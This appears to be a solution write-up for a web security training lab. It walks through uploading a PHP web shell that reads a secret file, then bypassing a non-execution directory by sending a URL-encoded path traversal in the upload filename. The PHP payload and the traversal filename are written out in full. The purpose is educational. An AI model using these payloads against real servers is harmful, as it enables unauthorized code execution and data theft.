Web shell upload via path traversal
Description
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
Reproduction and proof of concept
Log in and upload an image as your avatar, then go back to your account page.
In Burp, go to Proxy -> HTTP history and notice that your image was fetched using a GET request to
/files/avatars/<YOUR-IMAGE>
. Send this request to Burp Repeater.On your system, create a file called
exploit.php
, containing a script for fetching the contents of Carlos’s secret. For example:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Upload this script as your avatar. Notice that the website doesn’t seem to prevent you from uploading PHP files.
In Burp Repeater, go to the tab containing the
GET /files/avatars/<YOUR-IMAGE>
request. In the path, replace the name of your image file withexploit.php
and send the request. Observe that instead of executing the script and returning the output, the server has just returned the contents of the PHP file as plain text.In Burp’s proxy history, find the
POST /my-account/avatar
request that was used to submit the file upload and send it to Burp Repeater.In Burp Repeater, go to the tab containing the
POST /my-account/avatar
request and find the part of the request body that relates to your PHP file. In theContent-Disposition
header, change the filename to include a directory traversal sequence:
Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
Send the request. Notice that the response says
The file avatars/exploit.php has been uploaded
. This suggests that the server is stripping the directory traversal sequence from the file name.Obfuscate the directory traversal sequence by URL encoding the forward slash (
/
) character, resulting in:
filename="..%2fexploit.php"
Send the request.
The message now says The file avatars/../exploit.php has been uploaded
. This indicates that the file name is being URL decoded by the server.
In the browser, go back to the account page.
In Burp’s proxy history, find the
GET /files/avatars/..%2fexploit.php
request. This gives a404
response. But you can request this file usingGET /files/exploit.php
.
Submit the secret to solve the lab.
Exploitability
An attacker will need to log in; upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
; and then enter this secret using the button provided in the lab banner.